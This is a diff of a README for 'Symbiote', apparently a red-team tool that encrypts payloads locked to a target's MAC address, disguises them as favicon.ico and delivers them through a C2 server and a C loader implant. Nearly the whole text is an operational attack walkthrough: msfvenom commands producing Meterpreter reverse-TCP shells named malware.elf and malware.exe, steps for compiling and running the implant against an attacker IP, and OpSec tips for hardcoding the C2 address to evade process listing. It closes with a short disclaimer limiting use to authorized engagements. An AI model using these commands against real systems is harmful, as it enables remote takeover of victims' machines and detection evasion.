007Atharvmd/Symbiote/README.md

 You now have the executable CLI tool (symbiote.exe or symbiote) ready to use.

 🚀 Usage Guide
-1. Reconnaissance
+# 1. Reconnaissance
 Obtain the MAC address of your target machine.

 Linux: ip link or ifconfig (e.g., 08-8F-C3-12-3F-0E)

 Windows: ipconfig /all

-2. Payload Generation
+# 2. Payload Generation
-Generate a Stageless payload (recommended for stability).
+You can use ANY executable payload (C2 Agents, Reverse Shells, Ransomware Simulators, etc.).

-Linux Payload:
+# Example using MSFVenom (Stageless Meterpreter): Linux Payload:

-Bash

 msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f elf -o malware.elf

-Windows Payload:
+# Windows Payload:

-Bash

 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f exe -o malware.exe

-3. Weaponization (Encryption)
+# 3. Weaponization (Encryption)
 Use your compiled Symbiote tool to lock the payload to the target.

-Bash

-# Syntax: ./symbiote build --mac <TARGET_MAC> --input <PAYLOAD_FILE>
+ Syntax: ./symbiote build --mac <TARGET_MAC> --input <PAYLOAD_FILE>

-# Example (Windows PowerShell)
+ Example (Windows PowerShell)
 ./symbiote.exe build --mac 08-8F-C3-12-3F-0E --input malware.elf
 Output: favicon.ico (Encrypted file)

-4. Compile the Implant
+# 4. Compile the Implant
-Compile the C loader for your target OS using GCC.
+NOTE: Ideally, you should compile the implant on the victim machine (or a machine with the exact same OS architecture/libraries) to avoid compatibility issues like "GLIBC version mismatch."

 For Linux Targets:

-Bash

 gcc implant/implant.c -o implant-linux

 For Windows Targets:

-Bash

 gcc implant/implant.c -o implant.exe -lwinhttp -liphlpapi -lshell32

-5. Execution (The Attack)
+# 5. Execution (The Attack)
 Terminal 1: Attacker (C2 Server) Start the delivery server using your tool.

-Bash

-# Windows
+Windows
 ./symbiote.exe serve --port 8080

-# Linux
+Linux
 ./symbiote serve --port 8080

 Terminal 2: Victim (Implant) Run the compiled implant, pointing it to the attacker's IP.

-Bash

-# ./implant <ATTACKER_IP> <PORT>
+./implant <ATTACKER_IP> <PORT>
 ./implant-linux 192.168.1.50 8080

-⚠️ Operational Security (OpSec) Notes
+# ⚠️ Operational Security (OpSec) Notes
 Runtime Arguments: Currently, the C2 IP is passed via command line arguments for testing flexibility.
 In a real engagement, this should be hardcoded or patched into the binary to avoid process listing detection (ps aux).

 Disk Drop: This tool acts as a Dropper (writes to %TEMP% or /tmp).
 While this ensures compatibility with complex binaries (ELF/EXE), it is less stealthy than pure in-memory injection.

+# 🚧 Beta Notice
+This tool is currently in BETA.
+It has not been thoroughly tested on all Linux distributions or Windows versions.
+You may encounter issues with specific network configurations or library dependencies.
+Use with caution.

-⚖️ Disclaimer
+# ⚖️ Disclaimer
 This project is for educational purposes and authorized Red Team engagements only.

 The author is not responsible for any misuse of this tool.
 Do not use this against systems you do not have explicit permission to test.